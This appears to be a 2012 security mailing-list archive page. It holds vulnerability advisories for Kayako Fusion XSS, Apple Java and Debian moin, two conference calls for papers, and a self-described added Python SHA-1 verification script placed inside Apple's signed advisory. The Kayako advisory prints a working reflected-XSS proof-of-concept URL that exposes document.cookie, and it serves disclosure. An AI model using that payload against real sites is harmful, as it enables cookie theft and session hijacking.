https://www.htbridge.com/advisory/HTB23110 - Cross-Site Scripting (XSS) 
Vulnerabilities  in Flogr.
[2] Flogr - http://code.google.com/p/flogr/ - Flogr is a flexible script that 
displays your flickr photos in a customizable photo gallery you host on your 
website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types. 

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Cross-Site Scripting (XSS) in Kayako Fusion

2012-09-05 Thread advisory
Advisory ID: HTB23095
Product: Kayako Fusion
Vendor: Kayako
Vulnerable Version(s): 4.40.1148 and probably prior
Tested Version: 4.40.1148
Vendor Notification: June 6, 2012 
Public Disclosure: September 5, 2012 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2012-3233
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in 
Kayako Fusion, which can be exploited to perform Cross-Site Scripting (XSS) 
attacks.


1) Cross-Site Scripting (XSS) in Kayako Fusion: CVE-2012-3233

Input appended to the URL after 
/__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php is not 
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's 
browser session in context of an affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of this vulnerability requires that Apache's directive 
AcceptPathInfo is set to on or default (default value is default).

---

Solution:

Upgrade to Kayako Fusion 4.50.1581

More Information:
http://wiki.kayako.com/display/DOCS/4.50.1581

---

References:

[1] High-Tech Bridge Advisory HTB23095 - 
https://www.htbridge.com/advisory/HTB23095 - Cross-Site Scripting (XSS) in 
Kayako Fusion.
[2] Kayako Fusion - http://www.kayako.com - Kayako Fusion is the world's 
leading multi-channel helpdesk solution that enables organizations to deliver a 
better customer experience and work more effectively as a team, whatever their 
size.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types. 

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



[IMF 2013] Call for Papers

2012-09-05 Thread Oliver Goebel
Dear all,

for your information.

Please excuse possible cross postings.


CALL FOR PAPERS

   IMF 2013

  7th International Conference
   on IT Security Incident Management & IT Forensics

March 12th - 14th, 2013
  Nuremberg,  Germany



Conference Background
=====================
Today IT security is an integral aspect of operating IT systems. Yet,
despite high-end precautionary measures, not every attack or security
mishap can be prevented, and hence incidents will continue to happen.
In such cases, forensic capabilities for investigating incidents in
both their technical and legal aspects are paramount. Thus, capable
incident response and forensic procedures have gained essential
relevance in IT infrastructure operations, and there is ample need for
research and standardization in this area.

In law enforcement, IT forensics is an important branch whose
significance constantly increases, since IT has become an essential
part of almost every aspect of daily life. IT systems produce traces
and evidence in many ways that play an increasingly relevant role in
resolving cases.


Conference Goals
================
The IMF conference provides a platform for experts from throughout the
world to present and discuss recent technical and methodical advances in
the fields of IT security incident response and management and IT
forensics. It shall enable collaboration and exchange of ideas between
industry (both users and solution providers), academia, law enforcement
and other government bodies.


Conference Topics
=================
The scope of IMF 2013 is broad and includes, but is not limited to, the
following areas:
 
IT Security Incident Response
-----------------------------
  * Incident Response Procedures and Methods
  * Incident Response Formats and Standardization 
  * Tools Supporting Incident Response
  * Incident Analysis
  * CERTs/CSIRTs
  * Information Sources, Information Exchange, Communities
  * Dealing with Vulnerabilities (Vulnerability Response)
  * Monitoring and Early Warning
  * Incident Response in Non-Standard Environments (e.g. Embedded 
Systems)
  * Education and Training
  * Organizations
  * Legal and Enterprise Aspects (Jurisdiction, Applicable Laws 
and Regulations)

IT Forensics
------------
  * Trends and Challenges in IT Forensics
  * Application of Forensic Techniques in New Areas
  * Tools and Technology in Procedures for IT Forensics
  * Methods for the Gathering, Handling, Processing and Analysis of 
Digital Evidence
  * Evidence Protection in IT Environments
  * IT Forensics in Non-Standard Environments (e.g. Embedded Systems)
  * Source-Determination and Manipulation Detection (e.g. Multimedia
Forensics)
  * Standardization in IT Forensics
  * Education and Training
  * Organizations
  * Legal and Enterprise Aspects (Jurisdiction, Applicable Laws 
and Regulations)


Submission Details
==================
IMF invites submissions of full papers of up to 20 pages presenting
novel and mature research results, as well as practice papers of up to
20 pages describing best practices, case studies or lessons learned.
Proposals for workshops, discussions and presentations on practical
methods and challenges are also welcome.

All submissions must be written in English (see below), and either in
postscript or PDF format. Submissions must be anonymized. Authors of
accepted papers must ensure that their papers will be presented at the
conference. Submitted full papers must not substantially overlap papers
that have been published elsewhere or that are simultaneously submitted
to a journal or a conference with proceedings.

All submissions will be reviewed by the program committee and papers
accepted to be presented at the conference will be included in the
conference proceedings.

Submission Guidelines
---------------------
http://www.imf-conference.org/imf2013/

Language
--------
IMF 2013's scope is international, hence all submissions must be written
in English. Presentations of accepted papers must also be given in
English.


Publication
===========
Accepted papers will be published by the IEEE Computer Society's
Conference Publishing Services. Each participant of the conference will
receive a printed copy.


Dates and Deadlines
===================

October 15th, 2012: Deadline for submissions
December 3rd, 2012: Notification of acceptance or rejection 
December 10th, 2012: Due date for final camera-ready copies 
March 12th through 14th, 2013: IMF 2013 Conference


Fees and Registration Information
=================================
Information on fees and registration will be available at
http://www.imf-conference.org/imf2013/


Conference Chair
================
Felix Freiling

APPLE-SA-2012-09-05-1 Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10

2012-09-05 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2012-09-05-1 Java for OS X 2012-005 and
Java for Mac OS X 10.6 Update 10

Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10 are now
available and address the following:

Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description:  An opportunity for security-in-depth hardening is
addressed by updating to Java version 1.6.0_35. Further information
is available via the Java website at
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
CVE-ID
CVE-2012-0547

Java for OS X 2012-005 and Java for Mac OS X 10.6 Update 10
may be obtained from the Software Update pane in System Preferences,
or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/

For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.dmg
Its SHA-1 digest is: 6218979ae4eaef5ea7849cb4455e2c6f8bf362d2

For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX.dmg
Its SHA-1 digest is: e0750c72972b8a2ccbcb3144bb31d74419276387
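An added example, written for this page and not Apple's tooling, that checks a downloaded image against the two digests printed above. The file names and digests are the ones in this advisory; the streaming hash and the constant-time comparison are this example's own choices.

```python
"""Added example: verify the Java update downloads against the digests in
APPLE-SA-2012-09-05-1. Written for this page; not Apple's tooling.
"""
import hashlib
import hmac
import os

# Digests exactly as published in the advisory above.
EXPECTED_SHA1 = {
    "JavaForMacOSX10.6.dmg": "6218979ae4eaef5ea7849cb4455e2c6f8bf362d2",
    "JavaForOSX.dmg": "e0750c72972b8a2ccbcb3144bb31d74419276387",
}


def sha1_hex(data):
    """SHA-1 of an in-memory byte string as lowercase hex."""
    return hashlib.sha1(data).hexdigest()


def sha1_of_file(path, chunk_size=1 << 20):
    """SHA-1 of a file, streamed so a large .dmg is not read into memory at once."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def check_digest(file_name, actual_hex, expected=EXPECTED_SHA1):
    """Compare a computed digest with the published one.

    Returns "ok", "mismatch" or "unknown" (no published digest for that
    file name). Hex case is ignored; hmac.compare_digest is used so the
    comparison time does not depend on where the strings first differ.
    """
    published = expected.get(file_name)
    if published is None:
        return "unknown"
    if hmac.compare_digest(actual_hex.lower(), published.lower()):
        return "ok"
    return "mismatch"


def verify_download(path, expected=EXPECTED_SHA1):
    """Hash the file on disk and check it against the advisory's table."""
    return check_digest(os.path.basename(path), sha1_of_file(path), expected)


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, verify_download(p))
```

A "mismatch" also results from a truncated download, so re-fetch before assuming tampering. The digest only proves the file is the one Apple published if the digest itself came from a trusted channel: check the PGP signature on this advisory against Apple's published key (see the URL below) before relying on the table.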

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
-END PGP SIGNATURE-


[Rooted CON 2013] CFP starts!

2012-09-05 Thread Román Ramírez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Hello all,

Here you've attached all the necessary information for any potential
speakers willing to have a talk at Rooted CON 2013.

Kind regards to all and thanks in advance

__ _   _   ___  _   _
   / /  _ \ ___   ___ | |_ ___  __| |/ ___/ _ \| \ | |
  / /| |_) / _ \ / _ \| __/ _ \/ _` | |  | | | |  \| |
 / / |  _  (_) | (_) | ||  __/ (_| | |__| |_| | |\  |
/_/  |_| \_\___/ \___/ \__\___|\__,_|\\___/|_| \_|

RootedCON 2013 - 'Call for Papers'


PLEASE, READ CAREFULLY ALL THE DETAILS IN THIS DOCUMENT.


- -=] About RootedCON

RootedCON is a security congress that will take place between March 7
to 9, 2013 in Madrid (Spain).

With an estimated capacity of 670 people, it is one of the largest
specialized conferences ever held in the country and one of the largest
in Europe, with attendee profiles ranging from students and state forces
to IT security professionals and technology enthusiasts.

- -=] Types of talks

Two types of talks can be accepted:

- - Fast talks: 20 minutes.
- - Standard talks: 50 minutes.

There will be a limited number of each type, and the schedule may even be
adapted so that an interesting talk extends beyond 20 minutes or, for
specific needs, a 50-minute one is shortened.

- -=] Topics

Any relevant topic associated with the concept of hacking, for example
(these are not the only topics that interest us):

- - Hacking, cracking, phreaking, virii, WiFi, VoIP, GSM...
- - Critical Infrastructure Security, SCADA environments...
- - Hardware Hacking, Jtag, SWJ, Dap, ...
- - Console and gaming hacking.
- - Mobile terminals: android, iOS, Windows mobile, maemo,...
- - Reverse engineering, debugging, hooking, fuzzing, exploiting,...
- - Innovative tools and techniques both for defense and attack.
- - APT, botnets and malware.
- - (In)security cloud, virtual environments,...
- - Cryptographical techniques, steganography, covert channels,...
- - Forensics and antiforensics.
- - Networking, level2 and level3,...
- - Very original talks like the kind of audience we have...

In the last edition, there were popular talks related to hardware
hacking, modifying the behaviour of robots, specialized hardware,
or even device creation. Related keywords: Drones, Arduino, *copters,
Roomba, alarms, Jtag, cameras ...

For this edition, we are especially interested in 0-day
vulnerabilities and all kinds of security problems in any
critical infrastructures or platforms.

- -=] Papers submission procedure

We only accept talks submissions through the online form which has
been prepared for this purpose:

https://www.rootedcon.es/cfp2013-en/ (English)
https://www.rootedcon.es/cfp2013-es/ (Spanish)

Any other submission method will not be considered as official and
will not be evaluated by the selection team.

- -=] Schedule and milestones

05 Sep 2012 -   Launch of Call for Papers
14 Dec 2012 -   Call for Papers closing
Dec 2012    -   Get in touch and interviews with the speakers for final
confirmation.
Jan 2013    -   Publication of speakers schedule.

*4 Feb 2012 -   Speakers materials submission to Rooted*

7, 8 and 9 Mar 2013   -   /RootedCON2013


- -=] Benefits and privileges as speaker

Each speaker will receive the following benefits and privileges:

- - A dinner with the rest of the speakers, RootedLabs teachers and
RootedCON crew.
- - Accommodation (costs assumed by the organization)
- - Travel (costs assumed by the organization)
- - Full access to the whole congress
- - Free drinks at the party ;)
- - Management of potential job opportunities.
- - A surprise in gratitude for participation.

- -=] Duties and responsibilities of speakers

All speakers presenting at RootedCON 2013 must:

a) Confirm that the presented paper is technical and accompanied by a
proof of concept (PoC).

b) Send the material of the talk prior to the dates of the Congress.
Within the submission of material it is important to include details
about the demos that will be performed.

c) Develop the slides according to the RootedCON 2013 official templates.

d) Explicitly accept that the materials presented, as well as the video
and audio recordings made, may be published through RootedCON's content
management mechanisms or other media in the future. RootedCON *won't
censor* any of the materials, recordings, media publications or whatever
mechanisms by which they are made accessible to the public and the
congress attendees.

- -=] Sponsors and Partners

RootedCON is always looking for quality sponsors and partners. If you
have a proposal or you think your company may be interested, please
contact us at:

sponsors-AT-rootedcon.es

IMPORTANT: Due to the highly technical subject of the congress, and
the preferences shown by attendees in multiple surveys, we encourage
potential sponsors who intend to have a slot as speaker attempting 

[SECURITY] [DSA 2538-1] moin security update

2012-09-05 Thread Raphael Geissert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2538-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
September 05, 2012 http://www.debian.org/security/faq
- -

Package: moin
Vulnerability  : privilege escalation
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4404

It was discovered that Moin, a Python clone of WikiWiki, incorrectly
evaluates ACLs when virtual groups are involved. This may allow certain
users to have additional permissions (privilege escalation) or lack
expected permissions.

For the stable distribution (squeeze), this problem has been fixed in
version 1.9.3-1+squeeze2.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 1.9.4-8.

We recommend that you upgrade your moin packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAlBHnSAACgkQYy49rUbZzlpyrgCfWVw07a+DGjcWlbK09RF+Lw4Y
JAcAn1AdHlyFq+OfCLZ4gQhfBXcqxpw/
=+e4Z
-END PGP SIGNATURE-